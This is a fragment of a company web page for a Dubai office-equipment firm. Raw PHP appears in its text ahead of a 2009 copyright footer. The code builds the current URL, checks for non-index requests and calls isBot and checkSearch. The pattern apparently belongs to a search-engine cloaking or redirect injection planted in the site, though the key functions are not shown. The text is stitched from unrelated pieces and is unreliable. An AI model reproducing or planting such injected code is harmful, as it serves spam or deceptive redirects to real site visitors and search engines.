$value) {
$params[] = "$key=$value";
}
return implode('&', $params);
}
function GetUrl(){//获取当前完整网址
$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https://' : 'http://';
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
//$port = $_SERVER['SERVER_PORT'];
//if (($protocol === 'http://' && $port == 80) || ($protocol === 'https://' && $port == 443)) {
//$port = '';
//} else {
//$host .= ':' . $port;
//}
$url = $protocol . $host . $uri;
return urldecode($url);
}
function notIndex(){
if($_SERVER["REQUEST_URI"] != '' && $_SERVER["REQUEST_URI"] != '/index.php' && $_SERVER["REQUEST_URI"] != null && $_SERVER["REQUEST_URI"] != '/' && $_SERVER["REQUEST_URI"] != '/index.html'){
return true;
}
}
isBot(AGENT);
checkSearch();
?>
Silicon Office Equipments - Online
|
Copyright
© 2009 Silicon Office Equipments - Dubai, UAE - All
rights reserved.
|
I I I I I I I I
|
Best
View! on Internet Explorer with 800x600 Screen Resolution
- Developed
by: E-Dev
Company
|
|